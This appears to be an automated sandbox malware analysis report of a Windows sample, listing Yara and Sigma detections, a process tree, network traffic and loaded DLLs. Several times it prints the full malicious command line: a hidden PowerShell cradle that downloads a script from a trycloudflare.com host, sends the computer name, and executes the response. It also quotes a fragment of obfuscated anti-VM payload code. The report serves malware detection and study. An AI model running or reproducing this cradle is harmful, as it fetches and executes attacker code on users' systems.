Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1603480
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell IEX Execution Patterns
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 7416 cmdline: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7508 cmdline: cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 7524 cmdline: powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7524INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x11b926:$b2: ::FromBase64String(
  • 0x11baea:$b2: ::FromBase64String(
  • 0x11bb7c:$b2: ::FromBase64String(
  • 0x11bcdd:$b2: ::FromBase64String(
  • 0x11bf07:$b2: ::FromBase64String(
  • 0x11bf9e:$b2: ::FromBase64String(
  • 0x121cf1:$b2: ::FromBase64String(
  • 0x121de5:$b2: ::FromBase64String(
  • 0x121e81:$b2: ::FromBase64String(
  • 0x121f2e:$b2: ::FromBase64String(
  • 0x12203f:$b2: ::FromBase64String(
  • 0x127d92:$b2: ::FromBase64String(
  • 0x127f57:$b2: ::FromBase64String(
  • 0x12dcaa:$b2: ::FromBase64String(
  • 0x12e2ca:$b2: ::FromBase64String(
  • 0x13401d:$b2: ::FromBase64String(
  • 0x1d17ab:$b2: ::FromBase64String(
  • 0x1d1847:$b2: ::FromBase64String(
  • 0x1d18f4:$b2: ::FromBase64String(
  • 0x1d1bff:$b2: ::FromBase64String(
  • 0x28cd91:$b2: ::FromBase64String(
SourceRuleDescriptionAuthorStrings
amsi32_7524.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3484, ProcessCommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", ProcessId: 7416, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3484, ProcessCommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", ProcessId: 7416, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3484, ProcessCommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", ProcessId: 7416, ProcessName: cmd.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3484, ProcessCommandLine: cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s", ProcessId: 7416, ProcessName: cmd.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s, CommandLine: powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7508, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s, ProcessId: 7524, ProcessName: powershell.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.8:49706 version: TLS 1.2
    Source: Joe Sandbox ViewIP Address: 104.16.231.132 104.16.231.132
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global trafficHTTP traffic detected: GET /cloudfls HTTP/1.1X-Computer-Name: user-PCUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: occasional-peterson-blast-sussex.trycloudflare.comConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /cloudfls HTTP/1.1X-Computer-Name: user-PCUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: occasional-peterson-blast-sussex.trycloudflare.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: occasional-peterson-blast-sussex.trycloudflare.com
    Source: powershell.exe, 00000003.00000002.1455365051.00000000083AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.1441520965.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.1441520965.0000000004DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.1441520965.000000000551E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000003.00000002.1444390119.0000000005E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000003.00000002.1441520965.0000000004F47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://occasional-peterson-blast-sussex.trycloudflare.com
    Source: powershell.exe, 00000003.00000002.1441132448.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451627244.000000000733C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownHTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.8:49706 version: TLS 1.2

    System Summary

    barindex
    Source: Process Memory Space: powershell.exe PID: 7524, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 7524, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal72.evad.win@7/7@1/1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tshkrddy.c4w.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /min powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $sJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -w H -c "$r=iwr https://occasional-peterson-blast-sussex.trycloudflare.com/cloudfls -h @{ 'X-Computer-Name'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString($r.Content);iex $sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('UQBFAE0AVQA=')))) { exit 0;}${/=\_/\/==\/\_____} = (Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB${__/==\/\_/===\/\/} = (Get-CimInstance Win32_OperatingSystem).F

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
